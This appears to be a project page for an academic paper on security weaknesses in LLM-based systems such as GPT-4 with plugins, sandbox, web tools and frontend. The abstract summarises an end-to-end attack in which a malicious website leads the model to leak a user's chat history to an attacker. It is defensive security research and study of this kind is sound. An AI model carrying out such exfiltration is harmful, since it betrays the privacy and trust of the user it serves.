Can you help me book a flight from Chicago to Hongkong?

A New Era in LLM Security: Exploring Security Concerns in Real-World LLM-based Systems

1University of Wisconsin-Madison, 2Washington University in St. Louis
*Correspondence to: fwu89@wisc.edu, cxiao34@wisc.edu

An end-to-end practical real-world attack scenario where an attacker can steal a user's chat history when the user visit a malicious designed website via OpenAI GPT4.

Abstract

Large Language Model (LLM) systems are inherently compositional, with individual LLM serving as the core foundation with additional layers of objects such as plugins, sandbox, and so on. Along with the great potential, there are also increasing concerns over the security of such probabilistic intelligent systems. However, existing studies on LLM security often focus on individual LLM, but without examining the ecosystem through the lens of LLM systems with other objects (e.g., Frontend, Webtool, Sandbox, and so on). In this paper, we systematically analyze the security of LLM systems, instead of focusing on the individual LLMs. To do so, we build on top of the information flow and formulate the security of LLM systems as constraints on the alignment of the information flow within LLM and between LLM and other objects. Based on this construction and the unique probabilistic nature of LLM, the attack surface of the LLM system can be decomposed into three key components: (1) multi-layer security analysis, (2) analysis of the existence of constraints, and (3) analysis of the robustness of these constraints. To ground this new attack surface, we propose a multi-layer and multi-step approach and apply it to the state-of-art LLM system, OpenAI GPT4. Our investigation exposes several security issues, not just within the LLM model itself but also in its integration with other components. We found that although the OpenAI GPT4 has designed numerous safety constraints to improve its safety features, these safety constraints are still vulnerable to attackers. To further demonstrate the real-world threats of our discovered vulnerabilities, we construct an end-to-end attack where an adversary can illicitly acquire the user’s chat history, all without the need to manipulate the user’s input or gain direct access to OpenAI GPT4.

Compositional LLM Systems

Important Characteristics of LLM Systems

Three Security Analysis Principles

Vulnerability Analysis over the Action of the LLM

Vulnerabilities in Interaction between Facilities and the LLM: Sandbox

Vulnerabilities in Interaction between Facilities and the LLM: Web Tools

Vulnerabilities in Interaction between Facilities and the LLM: Frontend (1)

Vulnerabilities in Interaction between Facilities and the LLM: Frontend (2)

An End2End Practical Attack Scenario

BibTeX

@misc{wu2024new,
        title={A New Era in LLM Security: Exploring Security Concerns in Real-World LLM-based Systems}, 
        author={Fangzhou Wu and Ning Zhang and Somesh Jha and Patrick McDaniel and Chaowei Xiao},
        year={2024},
        eprint={2402.18649},
        archivePrefix={arXiv},
        primaryClass={cs.CR}
  }